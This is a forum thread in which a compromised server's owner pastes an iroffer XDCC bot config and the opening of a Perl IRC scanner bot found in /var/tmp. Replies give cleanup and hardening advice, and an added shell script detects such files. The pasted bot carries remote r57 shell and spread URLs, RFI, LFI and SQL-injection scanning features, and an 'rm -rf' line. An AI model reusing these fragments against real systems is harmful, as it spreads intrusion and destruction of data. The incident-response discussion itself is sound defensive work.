  1. #1
    Just Joined!
    Join Date
    Apr 2008
    Posts
    15

    My server is hacked, some IRC script...


    Hello,

    I have a big problem. I have a server at ThePlanet and in the last several days (maybe weeks) I sometimes see in the bandwidth graph that the 10 Mb/s link is 100% used, see http://img144.imageshack.us/img144/9...gimgphpvi3.png
    Then I looked in /var/tmp and found some bad code, maybe a script, in which there are some hacker email addresses and some IPs. In one file I also see some IRC script, and on the net I found that the script is for IRC download or something similar.

    This is an example of one file:

    pidfile .s
    logfile .f
    logstats no
    logrotate weekly
    statefile .lib.css
    xdcclistfile .lib.css~


    connectionmethod direct
    server 72.20.54.69 9000
    server 194.169.192.55 9000
    server 71.6.216.111 9000
    server 72.20.54.69 31967
    server 72.20.54.69 27397
    server 72.20.54.69 48618
    server 72.20.54.69 55493
    server 71.6.216.111 65267

    channel #ADD!KT!VE -plist 29 -key iNSOMNiA
    channel #ADD!KT-test -plist 60 -key PRiVATE

    nickserv_pass thu64l1f3

    user_nick [EU]-N3W
    user_realname 14,1# 14,1ADD4!14KT4!14VE
    user_modes +iB
    loginname FAST
    #usenatip 78.31.115.159


    slotsmax 15
    queuesize 30
    maxtransfersperperson 2
    maxqueueditemsperperson 3
    respondtochannelxdcc
    downloadhost *!*@*

    #headline 8,1welcome to everyone

    creditline 14,1ADD4!14KT4!14VE


    adminpass zBOTEinWEdNwI
    adminhost mdma!*@global-threat.us
    adminhost elmer*!*@elmer.wabbits.us
    adminhost CHR0NiC!*@addikt-help.us
    adminhost CHRONiC!*@addikt-help.us
    adminhost WEED!*@*.addikt-help.us

    uploadhost *!*@dean*.EsylumWarez.Net
    uploadhost *!*@bobby811.EsylumWarez.Net
    uploadhost mdma!*@global-threat.us
    uploadhost elmer*!*@elmer.wabbits.us
    uploadhost CHR0NiC*!*@addikt-help.us
    uploadhost CHRONiC*!*@addikt-help.us
    uploadhost WEED!*@*.addikt-help.us
    uploadhost [EU]*!*@*
    uploadhost [US]*!*@*
    uploadhost [DiSTRO]*!*@*
    uploadhost [KR]*!*@*

    uploaddir /var/tmp/.lib
    filedir /var/tmp/.lib
    notifytime 10
    nomd5sum
    And also some other files; here is the beginning of one as an example:

    #!/usr/bin/perl

    #####################################################################################
    ## ##
    ## ##
    ## 04/04/2008 ##
    ## Author : Osirys ##
    ## Team : Third Eye Security ##
    ## Ircd : 84.19.176.186 ##
    ## WebSite : ##
    ## Contact : osirys[at]live[dot]it ##
    ## ##
    ## ## IMPORTANT ## ##
    ## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ##
    ## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ##
    ## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR ##
    ## # SYSTEM MORE SECURE. ##
    ## ## ##
    ## ##
    ## Release: v5 Private ##
    ## I coded this tool only for fun , anyway it works well ! This is a Private ##
    ## Release, so if you have this Script, please, take care, and don't give it ##
    ## anyone ! Thank you. ##
    ## It's a IrcBot. So, after connecting on your Ircd, you can scan for RFI, ##
    ## LFI, SQL Injection on sites using dorks. ##
    ## Anyway, u may know, that this one is the better bot ever created ! ##
    ## Be happy ! ##
    ## ##
    ## Features: ##
    ## [+]Sql Injection Scanner ##
    ## [+]Remote File Inclusion Scanner ##
    ## [+]Local File Inclusion Scanner ##
    ## [+]Integrated Shell, so you can execute commands on the server ##
    ## [+]Security Mode to protect "dangerous" functions ##
    ## [+]Spread Mode, to activate or disable Spread Function ##
    ## [+]Bypass Engines ON: Google, Yahoo ##
    ## !: To "bypass" these engines, the Scanner just looks for websites on other ##
    ## engines that use the same bots than the main ones ##
    ## ##
    ## ##
    #####################################################################################



    ### !!_/ PRIVATE

    use IO::Socket::INET;
    use HTTP::Request;
    use LWP::UserAgent;

    #######################################################
    ## CONFIGURATION //
    #######################################################


    my $id = "http://rawcraft.info/spread.txt??"; #Your RFI Response
    my $shell = "http://r99.li/r57.txt??"; #Shell printed on the Vulnerable Site
    my $ircd = "irc.indoirc.net";
    my $port = "6667";
    my $chan1 = "#fntsze.biz"; #Chan for Scan
    my $chan2 = ""; #bot will be printed here too
    my $nick="fntsze[".int(rand(1000))."]"; # Scanner Nickname
    my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
    # (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
    # Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
    my $rfipidpr0c = 50;

    ### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

    my $spread = "http://rawcraft.info/t.txt???";

    my $spreadACT = 1; #0 ->disabled, 1 ->enabled
    my $securityACT = 1; #0 ->disabled, 1 ->enabled

    my $killpwd = "****off"; #Password to Kill the Bot
    my $chidpwd = "****off"; #Password to change the RFI Response
    my $cmdpwd = "****off"; #Password to execute commands on the server
    my $secpwd = "****off";
    my $spreadpwd = "****off";

    my $badspreadpwd != $spreadpwd;
    my $badkillpwd != $killpwd;
    my $badidpwd != $chidpwd;
    my $badcmdpwd =! $cmdpwd;


    #######################################################
    ## END OF CONFIGURATION //
    #######################################################

    open( $f1le, ">", "rm.txt" );
    print $f1le "\#!/usr/bin/perl\n";
    print $f1le "exec(\"rm -rf \*siti\*\")\;\n";
    close $f1le;
    etc...
    Does anybody have experience with this? How do I clean my server?

    Thank you very much, Mladen

  2. #2
    Just Joined!
    Join Date
    Apr 2008
    Posts
    15
    Uf, I picked the wrong forum category, please move it into the security forum.


    One friend tells me that I have an IRC bot on my server, but didn't tell me how to disable and remove it. It is a Perl script.

    Can you tell me how to do this?

  3. #3
    Just Joined!
    Join Date
    Sep 2007
    Location
    Lafayette, IN
    Posts
    83
    There are three things you need to do:

    1. Eliminate the problem
    2. Prevent the problem
    3. Resume operations

    To do part 1, the easiest way is to just delete the files. The trick here is finding all the files that need to be deleted. You should probably run chkrootkit (chkrootkit -- locally checks for signs of a rootkit) as well.

    For part 2, you need to figure out how this happened in the first place. Did you or another user download the code? Do you have the latest patches for your OS and applications installed? Are you using a firewall? Once you've figured out how this IRC bot got installed, you can prevent it from happening in the future.

    For part 3, if it's just a simple IRC bot, there's not much you need to do. However, it is hard to be sure if other things may have been changed as well (for example, the root password, firewall settings, etc). Honestly, your best bet is to find a backup from before this happened, and re-install.
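    As an added example for the "finding all the files" step in the answer above (not code from any post in this thread): a POSIX sh triage helper that lists hidden files under the scratch directories and flags those whose content matches the iroffer config keys or the Perl IRC bot shape quoted in the first post. The keyword lists and the default directories are assumptions.

```sh
#!/bin/sh
# Added triage helper for this thread (not code from any post). Lists hidden
# files under the scratch directories and flags those whose content matches
# the iroffer config keys or the Perl IRC bot quoted in the first post.
# Assumptions: the keyword lists and default directories below.

# Config keys copied from the pasted iroffer file.
BOT_KEYWORDS='^[[:space:]]*(xdcclistfile|nickserv_pass|adminhost|uploadhost|slotsmax|downloadhost)[[:space:]]'
# Shape of the pasted Perl script: an IRC socket plus the usual IRC verbs.
PERL_KEYWORDS='IO::Socket::INET|PRIVMSG|NICK |JOIN #'

# Print hidden files, and files inside hidden directories, under the given
# directories (default: the world-writable scratch locations).
list_hidden_files() {
    [ $# -eq 0 ] && set -- /tmp /var/tmp /dev/shm
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -type f \( -name '.*' -o -path '*/.*/*' \) 2>/dev/null
    done
}

# Classify each hidden file by its content; silent for files that match nothing.
flag_bot_files() {
    list_hidden_files "$@" | while IFS= read -r f; do
        if grep -Eq "$BOT_KEYWORDS" "$f" 2>/dev/null; then
            printf 'IROFFER-CONFIG %s\n' "$f"
        elif grep -q 'perl' "$f" 2>/dev/null && grep -Eq "$PERL_KEYWORDS" "$f"; then
            printf 'PERL-IRCBOT %s\n' "$f"
        fi
    done
}

# Cross-check: running processes whose working directory is a scratch dir
# (pid, cwd, command line). Linux /proc only; prints nothing elsewhere.
processes_in_scratch() {
    for p in /proc/[0-9]*; do
        cwd=$(readlink "$p/cwd" 2>/dev/null) || continue
        case "$cwd" in
            /tmp|/tmp/*|/var/tmp|/var/tmp/*|/dev/shm|/dev/shm/*)
                printf '%s %s %s\n' "${p#/proc/}" "$cwd" \
                    "$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null)" ;;
        esac
    done
}

# Usage: sh triage.sh --scan [dir ...]
if [ "${1:-}" = "--scan" ]; then
    shift
    flag_bot_files "$@"
    processes_in_scratch
fi
```

    A flagged file is a lead, not proof; compare the process list against the files before deleting anything so the running bot and its config are removed together.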

  4. #4
    Linux Guru smolloy's Avatar
    Join Date
    Apr 2005
    Location
    CA, but from N.Ireland
    Posts
    2,414
    This is indeed an IRC bot, but Ben Cotton's advice is good.

    Eliminating this one problem is easy -- you can just delete the files -- but you have a bigger problem on your hands. Someone nasty knows how to get into and operate your server. If you don't fix this problem, then they'll simply reinstall their bot.

    In this case my advice is always the same (and the same as Ben's). Clean reinstall.

    Hopefully you have some backups from before your system was compromised.
    Registered Linux user #388328 || Registered LFS user #15880
    AMD 64 X2 4600+ :: 2X1GB DDR2 800 :: GeForce 9400 GT 512MB :: ASUS M2N32 Deluxe :: 4X250GB SATAII
    Need instant help? Try us on IRC -- #linuxforums on freenode

  5. #5
    Just Joined!
    Join Date
    Jun 2009
    Posts
    1

    "ircbot"

    That is not an IRC bot, it's a script for a UNIX|Scanner.
    It's for scanning for sites to "infect" with a Unix bot for DDoS attacks, which is used for hitting off websites or a normal connection. If you do any type of DDoS attacking, I would NOT be posting a scanner showing you have tools like this, even if you didn't add it to your server, which is kinda odd because it can only be added from the root user using SSH. You might want to remove it from this site showing you have it on your server, because it pretty much makes your IRC a botnet, and you're showing others you have a botnet, pretty much.

  6. #6
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,558
    Whatever you do, when you reimage your system, or clean it out, make sure you remove all unknown user accounts and change the password on all of the remaining ones. Then restrict SSH access, or disable it altogether. Also, configure your firewall more robustly. If you can, you could install SElinux to have a more secure foundation system.
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!
